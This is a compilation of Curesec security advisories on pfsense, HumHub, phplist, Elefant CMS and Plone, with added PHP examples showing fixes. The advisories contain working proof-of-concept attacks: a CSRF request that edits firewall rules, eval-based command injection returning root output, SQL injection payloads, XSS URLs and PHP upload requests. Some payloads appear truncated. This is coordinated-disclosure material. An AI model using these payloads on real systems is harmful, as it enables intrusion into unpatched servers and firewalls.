[FD] pfsense 2.3.2: CSRF
Security Advisory - Curesec Research Team

1. Introduction

Affected Product:    pfsense 2.3.2
Fixed in:            2.3.3
Fixed Version Link:  https://pfsense.org/download/
Vendor Website:      https://www.pfsense.org/
Vulnerability Type:  CSRF
Remote Exploitable:  Yes
Reported to vendor:  02/06/2017
Disclosed to public: 03/24/2017
Release mode:        Coordinated Release
CVE:                 requested via DWF
Credits:             Tim Coen of Curesec GmbH

2. Overview

pfsense is an open source firewall. The web interface is written in PHP.

In version 2.3.2-RELEASE (amd64), the actions of creating and deleting
firewall rules are vulnerable to CSRF, enabling an attacker to edit these
rules with a little bit of social engineering.

3. Details

CVSS: Medium; 5.4
https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:L

Description:

The easyrule.php script is vulnerable to CSRF, which allows an attacker to
create or delete firewall rules.

Proof of Concept:

    GET /easyrule.php?action=pass&int=LAN&proto=any&src=192.168.1.1&dst=192.168.1.1&dstport=80&ipproto=inet

4. Solution

To mitigate this issue please upgrade at least to version 2.3.3:
https://pfsense.org/download/

Please note that a newer version might already be available.

5. Report Timeline

02/06/2017 Informed Vendor about Issue
02/07/2017 Vendor confirms + fixes issues in git
02/20/2017 Vendor releases fix + vendor advisory
03/24/2017 Disclosed to public

Blog Reference:
https://www.curesec.com/blog/article/blog/pfsense-232-CSRF-198.html

--
blog:      https://www.curesec.com/blog
Atom Feed: https://www.curesec.com/blog/feed.xml
RSS Feed:  https://www.curesec.com/blog/rss.xml
tweet:     https://twitter.com/curesec

Curesec GmbH
Curesec Research Team
Josef-Orlopp-Straße 54
10365 Berlin, Germany

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] pfsense 2.3.2: XSS
Security Advisory - Curesec Research Team

1. Introduction

Affected Product:    pfsense 2.3.2
Fixed in:            2.3.3
Fixed Version Link:  https://pfsense.org/download/
Vendor Website:      https://www.pfsense.org/
Vulnerability Type:  XSS
Remote Exploitable:  Yes
Reported to vendor:  02/06/2017
Disclosed to public: 03/24/2017
Release mode:        Coordinated Release
CVE:                 requested via DWF
Credits:             Tim Coen of Curesec GmbH

2. Overview

pfsense is an open source firewall. The web interface is written in PHP.

In version 2.3.2-RELEASE (amd64), it is vulnerable to reflected XSS. XSS can
lead to disclosure of cookies, session tokens etc.

3. Details

XSS 1

CVSS: Medium; 6.1
https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Description:

When performing a package reinstall via the package manager, the "from" and
"to" parameters are vulnerable to reflected XSS.

Proof of Concept:

    http://192.168.178.60/pkg_mgr_install.php?mode=reinstallpkg&pkg=pfSense-pkg-arping&from='">&to='">

Note that while the "pkg" parameter must be a valid package, it does not need
to actually be installed on the system.

Code: pkg_mgr_install.php

XSS 2

CVSS: Medium; 4.7
https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:C/C:L/I:L/A:N

Description:

The pkg_filter parameter of the pkg.php file is vulnerable to reflected XSS.
It should be noted that the xml parameter must point to an existing xml file,
which must contain a field of the type sorting with the
include_filtering_inputbox tag set. According to the vendor, the FreeRADIUS
package is affected.

Proof of Concept:

    192.168.10.150/pkg.php?xml=miniupnpd.xml&pkg_filter='">

Code: pkg.php

    echo " Filter text: ";

4. Solution

To mitigate this issue please upgrade at least to version 2.3.3:
https://pfsense.org/download/

Please note that a newer version might already be available.

5. Report Timeline

02/06/2017 Informed Vendor about Issue
02/07/2017 Vendor confirms + fixes issues in git
02/20/2017 Vendor releases fix + vendor advisory
03/24/2017 Disclosed to public

Blog Reference:
https://www.curesec.com/blog/article/blog/pfsense-232-XSS-197.html
[FD] pfsense 2.3.2: Code Execution
Security Advisory - Curesec Research Team

1. Introduction

Affected Product:    pfsense 2.3.2
Fixed in:            2.3.3
Fixed Version Link:  https://pfsense.org/download/
Vendor Website:      https://www.pfsense.org/
Vulnerability Type:  Code Execution
Remote Exploitable:  Yes
Reported to vendor:  02/06/2017
Disclosed to public: 03/24/2017
Release mode:        Coordinated Release
CVE:                 requested via DWF
Credits:             Tim Coen of Curesec GmbH

2. Overview

pfsense is an open source firewall. The web interface is written in PHP.

In version 2.3.2-RELEASE (amd64), the setup wizard is vulnerable to code
execution.

It should be noted that by default, only an administrator can access the
setup wizard. By default, administrators have far-reaching permissions via
the wizard and via other functionality. There are however some custom
configurations where this vulnerability could lead to privilege escalation or
undesired code execution.

Unknown to us, this issue had previously been discussed on the GitHub page of
OPNsense, a fork of pfsense, although it was not classified as a vulnerability
there.

3. Details

CVSS: Medium; 6.8
https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:A/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

When updating a config field, user input is passed to eval. For most config
types the input is sanitized. However, the sanitation can be bypassed, and
there is no sanitation at all for the config type interfaces_selection. Both
of these issues can lead to code execution.

An attacker needs an account with the privilege to use the wizard ("WebCfg -
pfSense wizard subsystem page"). The attack still works even if the privilege
"User - Config - Deny Config Write" is set, which would normally prevent the
user from performing changes on the server or from resetting the admin
password.

To reproduce the issue, visit
https://192.168.10.150/wizard.php?xml=openvpn_wizard.xml, follow the
instructions, and at the step where the "interface" parameter is used, use
wan";echo exec("id");" as the value.

Note also that the addslashes filter for types other than
interfaces_selection can be bypassed via ${passthru($_GET[x])}.

Proof of Concept:

    POST /wizard.php HTTP/1.1
    Host: 192.168.10.150
    Content-Length: 506

    __csrf_magic=sid%3A57913ee89f117b1d40fec5c590fe10d401717053%2C1450275812&xml=openvpn_wizard.xml&stepid=9&interface=wan";echo exec("id");"&protocol=TCP&localport=1194&description=fyjfyfyj&tlsauthentication=on&generatetlskey=on&dhparameters=2048&crypto=AES-256-CBC&digest=SHA1&engine=none&tunnelnet=&localnet=&concurrentcon=&compression=&dynip=on&addrpool=on&defaultdomain=&dnsserver1=&dnserver2=&dnserver3=&dnserver4=&ntpserver1=&ntpserver2=&nbttype=0&nbtscope=&winsserver1=&winsserver2=&advanced=&next=Next

    -> uid=0(root) gid=0(wheel) groups=0(wheel)

Code: /wizard.php

    function update_config_field($field, $updatetext, $unset, $arraynum, $field_type) {
        [...]
        if($field_type == "interfaces_selection") {
            $var = "\$config{$field_conv}";
            $text = "if (isset({$var})) unset({$var});";
            $text .= "\$config" . $field_conv . " = \"" . $updatetext . "\";";
            eval($text);
            return;
        }
        [...]
        $text = "\$config" . $field_conv . " = \"" . addslashes($updatetext) . "\";";
        eval($text);
    }

4. Solution

To mitigate this issue please upgrade at least to version 2.3.3:
https://pfsense.org/download/

Please note that a newer version might already be available.

5. Report Timeline

02/06/2017 Informed Vendor about Issue
02/07/2017 Vendor confirms + fixes issues in git
02/20/2017 Vendor releases fix + vendor advisory
03/24/2017 Disclosed to public

Blog Reference:
https://www.curesec.com/blog/article/blog/pfsense-232-Code-Execution-199.html
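The eval()-based assignment in update_config_field() quoted above is the root cause of both the addslashes bypass and the unsanitized interfaces_selection case. The following is an added example, not pfSense's code: the same config update written without eval(), walking the $config array by key path instead. The bracket-path format "['a']['b'][0]" is assumed from the $field_conv usage in the snippet; the function names are my own.

```php
<?php
// Added example, not pfSense's code: a hardened counterpart of the
// update_config_field() routine quoted in the advisory. Instead of building
// PHP source text and passing it to eval(), the value is written into the
// $config array by walking a key path, so whatever the user submits is only
// ever stored as a string. The bracket-path format "['a']['b'][0]" is an
// assumption about $field_conv; the function names are my own.

/**
 * Split a path like "['openvpn']['server'][0]['interface']" into its keys.
 * Only single-quoted string keys and integer keys are accepted; any other
 * content makes the whole path invalid instead of being interpreted.
 */
function parse_field_path(string $path): array
{
    $matches = [];
    $count = preg_match_all('/\[\'([^\']*)\'\]|\[(\d+)\]/', $path, $matches, PREG_SET_ORDER);
    if ($count === 0 || implode('', array_column($matches, 0)) !== $path) {
        throw new InvalidArgumentException("malformed config path: $path");
    }
    $keys = [];
    foreach ($matches as $m) {
        // $m[2] is only present (and non-empty) for the [digits] alternative.
        $keys[] = isset($m[2]) && $m[2] !== '' ? (int) $m[2] : $m[1];
    }
    return $keys;
}

/**
 * Assign $value at $path inside $config without eval(). Intermediate arrays
 * are created on demand. Because the value is assigned directly, neither
 * addslashes() nor any other escaping is needed: closing-quote sequences or
 * "${...}" in $value have no meaning, PHP never parses them as code.
 */
function set_config_field(array &$config, string $path, string $value): void
{
    $keys = parse_field_path($path);
    $last = array_pop($keys);
    $ref = &$config;
    foreach ($keys as $key) {
        if (!isset($ref[$key]) || !is_array($ref[$key])) {
            $ref[$key] = [];
        }
        $ref = &$ref[$key];
    }
    $ref[$last] = $value;
}

/**
 * The advisory's code did no sanitising at all for interfaces_selection.
 * Beyond avoiding eval(), the value should name an interface that actually
 * exists in the configuration; anything else is refused, not stored.
 */
function set_interface_field(array &$config, string $path, string $value): bool
{
    if (!array_key_exists($value, $config['interfaces'] ?? [])) {
        return false;
    }
    set_config_field($config, $path, $value);
    return true;
}

// Constructed configuration and the two payloads quoted in the advisory.
$config = ['interfaces' => ['wan' => ['if' => 'em0'], 'lan' => ['if' => 'em1']]];
$path = "['openvpn']['openvpn-server'][0]['interface']";

foreach (['wan', 'wan";echo exec("id");"', '${passthru($_GET[x])}'] as $candidate) {
    $ok = set_interface_field($config, $path, $candidate);
    printf("%-28s %s\n", $candidate, $ok ? 'stored' : 'rejected (not a configured interface)');
}

// For free-text fields the submitted string is stored verbatim, never executed.
set_config_field($config, "['openvpn']['openvpn-server'][0]['description']", '${passthru($_GET[x])}');
var_dump($config['openvpn']['openvpn-server'][0]['description']);
```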
[FD] HumHub 0.20.1 / 1.0.0-beta.3: Code Execution
Security Advisory - Curesec Research Team

1. Introduction

Affected Product:    HumHub 0.20.1 / 1.0.0-beta.3
Fixed in:            1.0.0
Fixed Version Link:  https://www.humhub.org/en/download/default/form?version=1.0.0&type=zip
Vendor Website:      https://www.humhub.org/
Vulnerability Type:  Code Execution
Remote Exploitable:  Yes
Reported to vendor:  01/10/2016
Disclosed to public: 03/17/2017
Release mode:        Coordinated Release
CVE:                 n/a
Credits:             Tim Coen of Curesec GmbH

2. Overview

HumHub is a social media platform written in PHP. In version 0.20.1 as well
as 1.0.0-beta.3, it is vulnerable to code execution, as some functionality
allows the uploading of PHP files. Successful exploitation requires specific
server settings. A user account is required as well, but registration is open
by default.

3. Details

CVSS: High 7.6 AV:N/AC:H/Au:N/C:C/I:C/A:C

Most of the file uploads of HumHub check the file extension or file type
before uploading a file. However, the file upload of the "What's on your
mind?" text box allows the upload of arbitrary files.

A htaccess file forbids the execution of PHP code in uploaded files, but some
servers are configured to not read htaccess files. This is for example the
case with default Apache configurations. Because of this, uploaded files
should be checked to not have dangerous file extensions.

An account is needed, but the registration is open by default.

An admin does have the option to configure what files are allowed here:
http://localhost/humhub-0.20.0/index.php?r=admin%2Fsetting%2Ffile. But by
default, all files are allowed (although .htaccess is renamed).

It should also be noted that the documentation specifically mentions that the
upload directory needs to be protected. However, it is to be assumed that not
all users follow this suggestion, especially as there is no warning in the
installation process itself.

Proof of Concept:

    POST /humhub-0.20.1/index.php?r=file%2Ffile%2Fupload&objectModel=&objectId= HTTP/1.1
    Host: localhost
    Accept: application/json, text/javascript, */*; q=0.01
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    X-CSRF-Token: TzMwdHgxWkcafVg5EHsjKyBeQS0fUCMBeHdxPg1wDiV2cEZZN3xrDw==
    X-Requested-With: XMLHttpRequest
    Content-Length: 1080
    Content-Type: multipart/form-data; boundary=---101749290911301792911842334968
    Cookie: [...]
    Connection: keep-alive
    Pragma: no-cache
    Cache-Control: no-cache

    -----101749290911301792911842334968
    Content-Disposition: form-data; name="_csrf"

    TzMwdHgxWkcafVg5EHsjKyBeQS0fUCMBeHdxPg1wDiV2cEZZN3xrDw==
    -----101749290911301792911842334968
    Content-Disposition: form-data; name="message"


    -----101749290911301792911842334968
    Content-Disposition: form-data; name="notifyUserInput"


    -----101749290911301792911842334968
    Content-Disposition: form-data; name="containerGuid"

    3edb07bd-969f-4da3-a4bc-3e2f92a6474c
    -----101749290911301792911842334968
    Content-Disposition: form-data; name="containerClass"

    humhub\modules\user\models\User
    -----101749290911301792911842334968
    Content-Disposition: form-data; name="fileList"


    -----101749290911301792911842334968
    Content-Disposition: form-data; name="files[]"; filename="test.php"
    Content-Type: application/x-php

4. Solution

https://www.humhub.org/en/download/default/form?version=1.0.0&type=zip

Please note that a newer version might already be available.

5. Report Timeline

01/10/2016 Informed Vendor about Issue
01/12/2016 Vendor confirms issue
02/10/2016 Vendor requests more time
03/27/2016 Vendor releases fix
03/17/2017 Disclosed to public

Blog Reference:
https://www.curesec.com/blog/article/blog/HumHub-0201--100-beta3-Code-Execution-196.html
[FD] HumHub 1.0.1: XSS
Security Advisory - Curesec Research Team

1. Introduction

Affected Product:    HumHub 1.0.1 and earlier
Fixed in:            1.1.1
Fixed Version Link:  https://www.humhub.org/en/download/default/form?version=1.1.1&type=zip
Vendor Website:      https://www.humhub.org/
Vulnerability Type:  XSS
Remote Exploitable:  Yes
Reported to vendor:  01/10/2016
Disclosed to public: 03/17/2017
Release mode:        Coordinated Release
CVE:                 n/a
Credits:             Tim Coen of Curesec GmbH

2. Overview

HumHub is a social media platform written in PHP. In version 1.0.1 and
earlier, it is vulnerable to a reflected XSS attack if debugging is enabled,
as well as a self-XSS attack. This allows an attacker to steal cookies, inject
JavaScript keyloggers, or bypass CSRF protection.

3. Details

XSS 1: Reflected XSS

CVSS: Medium 4.3 AV:N/AC:M/Au:N/C:N/I:P/A:N

Description:

When the debug mode is enabled, which it is by default, the UserSearch
parameter is vulnerable to reflected XSS. Additionally, the resulting error
page discloses all cookies, even httpOnly cookies, and the contents of the
$_SERVER array.

Proof of Concept:

    http://localhost/humhub-0.20.0/index.php?UserSearch[last_login]=alert(1)&r=admin%2Fuser

XSS 2: DOM-based Self-XSS

CVSS: Low 2.6 AV:N/AC:H/Au:N/C:N/I:P/A:N

There is a reflected DOM-based self-XSS vulnerability in HumHub. It may be
possible to exploit this issue via ClickJacking in some browsers.

Proof of Concept:

Visit the profile of a user:

    http://localhost/humhub-0.20.0/index.php?r=space%2Fspace&sguid=d2f06d0a-47e1-4549-b469-c8a1df48faca

In the "What's on your mind?" text box enter: '">

4. Solution

To mitigate this issue please upgrade at least to version 1.1.1:
https://www.humhub.org/en/download/default/form?version=1.1.1&type=zip

Please note that a newer version might already be available.

5. Report Timeline

01/10/2016 Informed Vendor about Issue
01/12/2016 Vendor confirms issue
02/10/2016 Vendor requests more time
08/16/2016 Vendor releases partial fix
09/26/2016 Vendor releases fix
03/27/2017 Disclosed to public

Blog Reference:
https://www.curesec.com/blog/article/blog/HumHub-101-XSS-195.html
[FD] phplist 3.2.6: XSS
Security Advisory - Curesec Research Team

1. Introduction

Affected Product:    phplist 3.2.6
Fixed in:            3.3.1
Fixed Version Link:  https://sourceforge.net/projects/phplist/files/phplist/3.3.1/phplist-3.3.1.zip/download
Vendor Website:      https://www.phplist.org/
Vulnerability Type:  XSS
Remote Exploitable:  Yes
Reported to vendor:  01/10/2017
Disclosed to public: 02/20/2017
Release mode:        Coordinated Release
CVE:                 n/a (not requested)
Credits:             Tim Coen of Curesec GmbH

2. Overview

phplist is an application to manage newsletters, written in PHP. In version
3.2.6, it is vulnerable to Cross Site Scripting. The application contains one
reflected XSS and multiple persistent XSS vulnerabilities. The persistent XSS
vulnerabilities are only exploitable by users with specific privileges.

3. Details

Reflected XSS

CVSS: Medium 6.1 CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

The page parameter is vulnerable to reflected XSS.

Proof of Concept:

    http://localhost/lists/admin/?page=send\'\">alert(8)&id=187&tk=c

Persistent XSS

CVSS: Medium 5.5 CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:C/C:L/I:L/A:N

Various components of the administration interface are vulnerable to
persistent XSS. While a user account is required to exploit these issues,
they may be used by less privileged users to escalate their privileges.

Persistent XSS: List Name

The name of a list is echoed in various locations without encoding, leading
to persistent XSS. An account with the privilege to create a list is
required.

Proof of Concept:

Add a new list: http://localhost/lists/admin/?page=editlist&tk=c
As name use: list'">

To trigger the payload, visit:
- Add new subscribers to list:
  http://localhost/lists/admin/?page=importsimple&list=84&tk=c
- Overview of all lists:
  http://localhost/lists/admin/?page=list&tk=c
- List members of list:
  http://localhost/lists/admin/?page=members&id=3&tk=c
- View member (loaded as part of the lists tab):
  http://localhost/lists/admin/?page=user&id=4
- Creating a campaign (in step 4):
  http://localhost/lists/admin/?page=send&id=2&tk=c&tab=Lists

Persistent XSS: Subscribe Page

Various parameters of the subscribe page, such as the title, are vulnerable
to persistent XSS. An account with the privilege to edit the subscribe page
is required.

Proof of Concept:

Add a new subscribe page: http://localhost/lists/admin/?page=spage
As title use: subscribe'">

To trigger the payload:
- Visit the subscribe page:
  http://localhost/lists/index.php?p=subscribe&id=1
- Visit the subscribe page overview:
  http://localhost/lists/admin/?page=spage

Persistent XSS: Bounce Rule

The expression parameter of bounce rules is vulnerable to persistent XSS. An
account with the privilege to edit bounce rules is required.

Proof of Concept:

Add a new bounce rule: http://localhost/lists/admin/?page=bouncerules&type=active
As regular expression use: test'">

To trigger the payload, visit:
  http://localhost/lists/admin/?page=bouncerules&type=active

4. Solution

To mitigate this issue please upgrade at least to version 3.3.1:
https://sourceforge.net/projects/phplist/files/phplist/3.3.1/phplist-3.3.1.zip/download

Please note that a newer version might already be available.

5. Report Timeline

01/10/2017 Informed Vendor about Issue
01/16/2017 Vendor confirms
02/15/2017 Asked Vendor to confirm that new release fixes issues
02/15/2017 Vendor confirms
02/20/2017 Disclosed to public

Blog Reference:
https://www.curesec.com/blog/article/blog/phplist-326-XSS-194.html
[FD] phplist 3.2.6: SQL Injection
Security Advisory - Curesec Research Team

1. Introduction

Affected Product:    phplist 3.2.6
Fixed in:            3.3.1
Fixed Version Link:  https://sourceforge.net/projects/phplist/files/phplist/3.3.1/phplist-3.3.1.zip/download
Vendor Website:      https://www.phplist.org/
Vulnerability Type:  SQL Injection
Remote Exploitable:  Yes
Reported to vendor:  01/10/2017
Disclosed to public: 02/20/2017
Release mode:        Coordinated Release
CVE:                 n/a (not requested)
Credits:             Tim Coen of Curesec GmbH

2. Overview

phplist is an application to manage newsletters, written in PHP. In version
3.2.6, it is vulnerable to SQL injection. The application contains two SQL
injections, one of which is in the administration area and one of which
requires no credentials. Additionally, at least one query is not properly
protected against injections. Furthermore, a query in the administration area
discloses some information on the password hashes of users.

3. Details

SQL Injection 1: Edit Subscription

CVSS: High 7.1 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L

It is possible for an unauthenticated user to perform an SQL injection when
updating the subscription information of an already subscribed user.

The protection against SQL injection relies on a combination of a custom
magic quotes function, which applies addslashes to all input values, and a
function which applies htmlspecialchars to all inputs. Additionally, some
input values are cast to integers to prevent injections. addslashes protects
against injections into arguments which are placed into single quotes, while
htmlspecialchars protects against injections into double quotes. It should be
noted that neither addslashes nor htmlspecialchars are recommended to prevent
SQL injection.

The update functionality is vulnerable to SQL injection as it uses the keys
of the POST data, while only the values of the POST data, not the keys, are
escaped via addslashes.

Proof of Concept:

    POST /lists/index.php?p=subscribe&uid=f8082b7cc4da7f94ba42d88ebfb5b1e2&email=foo%40example.com HTTP/1.1
    Host: localhost
    Connection: close
    Content-Length: 209

    email=foo%40example.com&emailconfirm=foo%40example.com&textemail=1&list%5B2 or extractvalue(1,version()) %5D=signup&listname%5B2%5D=newsletter&VerificationCodeX=&update=Subscribe+to+the+selected+newsletters%27

The proof of concept is chosen for simplicity and will only work if error
messages are displayed to the user. If this is not the case, other techniques
can be used to extract data from the database.

Code: /lists/admin/subscribelib2.php

    $lists = '';
    if (is_array($_POST['list'])) {
        while (list($key, $val) = each($_POST['list'])) {
            if ($val == 'signup') {
                $result = Sql_query("replace into {$GLOBALS['tables']['listuser']} (userid,listid,entered) values($userid,$key,now())");
                # $lists .= " * ".$_POST["listname"][$key]."\n";
            }
        }
    }

SQL Injection 2: Sending Campaign (Admin)

CVSS: Medium 4.7 CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L

When sending a campaign, the sendformat parameter is vulnerable to SQL
injection. The injection takes place into an UPDATE, so the easiest way to
extract data is via error based SQL injection.

An account with the right to send campaigns is required to exploit this
issue.

Proof of Concept:

    POST /lists/admin/?page=send&id=2&tk=c&tab=Format HTTP/1.1
    Host: localhost
    Cookie: PHPSESSID=k6m0jgl4niq7643hohik5jgm12
    Connection: close
    Content-Length: 323

    formtoken=27211e65922b95d986bfaf706ccd2ca0&workaround_fck_bug=1&followupto=http%3A%2F%2Flocalhost%2Flists%2Fadmin%2F%3Fpage%3Dsend%26id%3D2%26tk%3Dc%26tab%3DScheduling&htmlformatted=auto&sendformat=HTML" or extractvalue(1,version()) -- - &id=2&status=draft&id=2&status=draft&campaigntitle=campaign+meta%27%22%3E&testtarget=

Code:

    // /lists/admin/send_core.php:198
    $result = Sql_Query(
        sprintf('update %s set subject = "%s", fromfield = "%s", tofield = "%s",
                 replyto ="%s", embargo = "%s", repeatinterval = "%s", repeatuntil = "%s",
                 message = "%s", textmessage = "%s", footer = "%s", status = "%s",
                 htmlformatted = "%s", sendformat = "%s", template = "%s" where id = %d',
            $tables['message'],
            sql_escape(strip_tags($messagedata['campaigntitle'])), /* we store the title in the subject field. Better would be to rename the DB column, but this will do for now */
            sql_escape($messagedata['fromfield']),
            sql_escape($messagedata['tofield']),
            sql_escape($messagedata['replyto']),
            sprintf('%d-%d-%d %d:%d', $messagedata['embargo']['year'], $messagedata['embargo']['month'], $messagedata['embargo']['day'], $messagedata['embargo']['hour'], $messagedata['embargo']['minute']),
            $messagedata['repeatinterval'],
            sprintf('%d-%d-%d %d:%d', $messagedata['repeatuntil']['year'], $messagedata['repeatuntil']['month'], $messagedata['repeatuntil']['day'], $messagedata['repeatuntil']['hour'], $messagedata['repeatuntil']['minute']),
            sql_escape($messagedata['message']),
            sql_escape($messagedata['textmessage']),
            sql_escape($messagedata['footer']),
            sql_escape($messagedata['status']),
            $ht
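The first injection above works because the escaping layer only touches the values of $_POST['list'], never its keys, which the subscribelib2.php loop splices straight into the query. The following is an added example, not phplist's code: the same loop with the list id validated as an integer and the statement parameterised. It uses an in-memory SQLite database so it runs stand-alone; the table name phplist_listuser and the date handling (SQLite has no now()) are assumptions, and the function names are my own.

```php
<?php
// Added example, not phplist's code: the subscription-update loop from the
// advisory rewritten so that the array KEYS taken from $_POST are validated
// and the query is parameterised. Runs against an in-memory SQLite database;
// the table name and columns follow the advisory's snippet, the function
// names are my own.

function create_schema(PDO $db): void
{
    $db->exec('CREATE TABLE phplist_listuser (
        userid  INTEGER NOT NULL,
        listid  INTEGER NOT NULL,
        entered TEXT    NOT NULL,
        PRIMARY KEY (userid, listid))');
}

/**
 * Subscribe $userid to every list the form marked as "signup".
 *
 * $postList mirrors $_POST['list']: an array of listid => 'signup'|''.
 * The list id comes from the array KEY, which phplist's magic-quotes layer
 * never escaped. Here it is validated as a positive integer before use and
 * bound as a parameter, so the SQL text never contains user input at all.
 * Returns which ids were written and which keys were rejected.
 */
function subscribe_to_lists(PDO $db, int $userid, array $postList): array
{
    $written = [];
    $rejected = [];
    $stmt = $db->prepare('REPLACE INTO phplist_listuser (userid, listid, entered)
                          VALUES (:userid, :listid, :entered)');
    foreach ($postList as $key => $val) {
        if ($val !== 'signup') {
            continue;
        }
        // A key such as "2 or extractvalue(1,version())" fails this check.
        $listid = filter_var($key, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
        if ($listid === false) {
            $rejected[] = (string) $key;
            continue;
        }
        $stmt->execute([
            ':userid'  => $userid,
            ':listid'  => $listid,
            ':entered' => date('Y-m-d H:i:s'),   // stands in for MySQL's now()
        ]);
        $written[] = $listid;
    }
    return ['written' => $written, 'rejected' => $rejected];
}

// Constructed input modelled on the advisory's proof of concept.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
create_schema($db);

$postList = [
    '3'                              => 'signup',
    '2 or extractvalue(1,version())' => 'signup',
    '5'                              => '',
];
print_r(subscribe_to_lists($db, 17, $postList));

// Only the validated id reached the table.
print_r($db->query('SELECT userid, listid FROM phplist_listuser ORDER BY listid')
           ->fetchAll(PDO::FETCH_ASSOC));
```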
[FD] Elefant CMS 1.3.12-RC: Code Execution
Security Advisory - Curesec Research Team

1. Introduction

Affected Product:    Elefant CMS 1.3.12-RC
Fixed in:            1.3.13
Fixed Version Link:  https://github.com/jbroadway/elefant/releases/tag/elefant_1_3_13_rc
Vendor Website:      https://www.elefantcms.com/
Vulnerability Type:  Code Execution
Remote Exploitable:  Yes
Reported to vendor:  09/05/2016
Disclosed to public: 02/02/2017
Release mode:        Coordinated Release
CVE:                 n/a (not requested)
Credits:             Tim Coen of Curesec GmbH

2. Overview

Elefant is a content management system written in PHP. In version 1.3.12-RC,
it is vulnerable to code execution because of two different vulnerabilities.
It allows the upload of files with dangerous type, as well as PHP code
injection. An account is required to exploit these issues.

3. Details

Upload of file with dangerous type

CVSS: High 9.0 AV:N/AC:L/Au:S/C:C/I:C/A:C

The file upload forbids the uploading of files with the .php extension, but
allows the uploading of files with a number of other dangerous extensions,
leading to code execution and XSS.

A user account is required which has the right to upload and manage files.
By default, the editor and admin roles have this right.

Proof of Concept:

    POST /filemanager/upload/drop HTTP/1.1
    Host: localhost
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Content-Type: multipart/form-data; boundary=--multipartformboundary1472116478634
    X-Requested-With: XMLHttpRequest
    Content-Length: 316
    Cookie: PHPSESSID=57uejmot41c4jsbtbac85mek55; elefant_update_checked=1; elefant_last_page=%2Fuser; elefant_user=nj86h42vi2j73tsturvq4slr05
    Connection: close

    ----multipartformboundary1472116478634
    Content-Disposition: form-data; name="path"


    ----multipartformboundary1472116478634
    Content-Disposition: form-data; name="file"; filename="test.php5"
    Content-Type: application/x-php

PHP code injection

Proof of Concept:

    http://localhost/designer/add/layout

Enter {{passthru('id')}} in the textarea.

4. Solution

To mitigate this issue please upgrade at least to version 1.3.13.

Please note that a newer version might already be available.

5. Report Timeline

09/05/2016 Informed Vendor about Issue, Vendor announces fix
11/07/2016 Asked Vendor if recent release fixes issues, Vendor confirmed
02/02/2017 Disclosed to public

Blog Reference:
https://www.curesec.com/blog/article/blog/Elefant-CMS-1312-RC-Code-Execution-188.html
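Both the HumHub upload (which accepted any file and relied on .htaccess) and the Elefant upload above (which blocked only ".php" and let "test.php5" through) fail for the same reason: a denylist of extensions. The following is an added example, not HumHub's or Elefant's code, of the allowlist-based check both advisories call for. The allowed extension list and the function names are my own.

```php
<?php
// Added example, not HumHub's or Elefant's code: an allowlist-based upload
// check. Blocking ".php" alone leaves ".php5", ".phtml" and similar
// extensions through, so only a fixed set of known-harmless extensions is
// accepted, every extension of a multi-dot name is checked, and the file is
// stored under a server-generated name. The list below is my own choice.

const ALLOWED_EXTENSIONS = ['jpg', 'jpeg', 'png', 'gif', 'pdf', 'txt'];

/**
 * Lower-cased list of every extension in a file name, for example
 * "report.PDF" -> ["pdf"], "test.php5" -> ["php5"], "README" -> [].
 * basename() strips any directory part a client might send along.
 */
function extensions_of(string $filename): array
{
    $parts = explode('.', basename($filename));
    array_shift($parts);                     // drop the base name itself
    return array_map('strtolower', $parts);
}

/**
 * Accept the upload only when it has at least one extension and every
 * extension is on the allowlist. Checking all of them, not just the last,
 * means a name that smuggles a second extension in the middle is refused
 * too, and a dotfile such as ".htaccess" has no allowed extension either.
 */
function is_allowed_upload(string $filename): bool
{
    $exts = extensions_of($filename);
    if ($exts === []) {
        return false;
    }
    foreach ($exts as $ext) {
        if (!in_array($ext, ALLOWED_EXTENSIONS, true)) {
            return false;
        }
    }
    return true;
}

/**
 * Name to store an accepted file under: a random token plus its validated
 * final extension. The client-supplied name never reaches the filesystem.
 * Keeping the target directory outside the document root (and serving files
 * through a script) additionally removes the dependence on .htaccess that
 * the HumHub advisory describes.
 */
function storage_name(string $filename): string
{
    $exts = extensions_of($filename);
    return bin2hex(random_bytes(16)) . '.' . end($exts);
}

// Constructed file names, including the one from the Elefant proof of concept.
foreach (['photo.jpg', 'notes.PDF', 'test.php5', 'test.php', '.htaccess', 'README'] as $name) {
    $ok = is_allowed_upload($name);
    printf("%-12s %s\n", $name, $ok ? 'accepted as ' . storage_name($name) : 'rejected');
}
```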
[FD] Plone: XSS
Security Advisory - Curesec Research Team

1. Introduction

Affected Product:    Plone 5.0.5
Fixed in:            Hotfix 20170117
Fixed Version Link:  https://plone.org/security/hotfix/20170117
Vendor Contact:      secur...@plone.org
Vulnerability Type:  XSS
Remote Exploitable:  Yes
Reported to vendor:  09/05/2016
Disclosed to public: 01/26/2017
Release mode:        Coordinated Release
CVE:                 CVE-2016-7147
Credits:             Tim Coen of Curesec GmbH

2. Overview

Plone is an open source CMS written in Python. In version 5.0.5, the Zope
Management Interface (ZMI) component is vulnerable to reflected XSS as it
does not properly encode double quotes.

3. Details

CVSS: Medium 4.3 AV:N/AC:M/Au:N/C:N/I:P/A:N

Description:

The search functionality of the management interface is vulnerable to
reflected XSS. As the input is echoed into an HTML attribute, an attacker can
use double quotes to escape the current attribute and add new attributes to
enter a JavaScript context.

Proof of Concept:

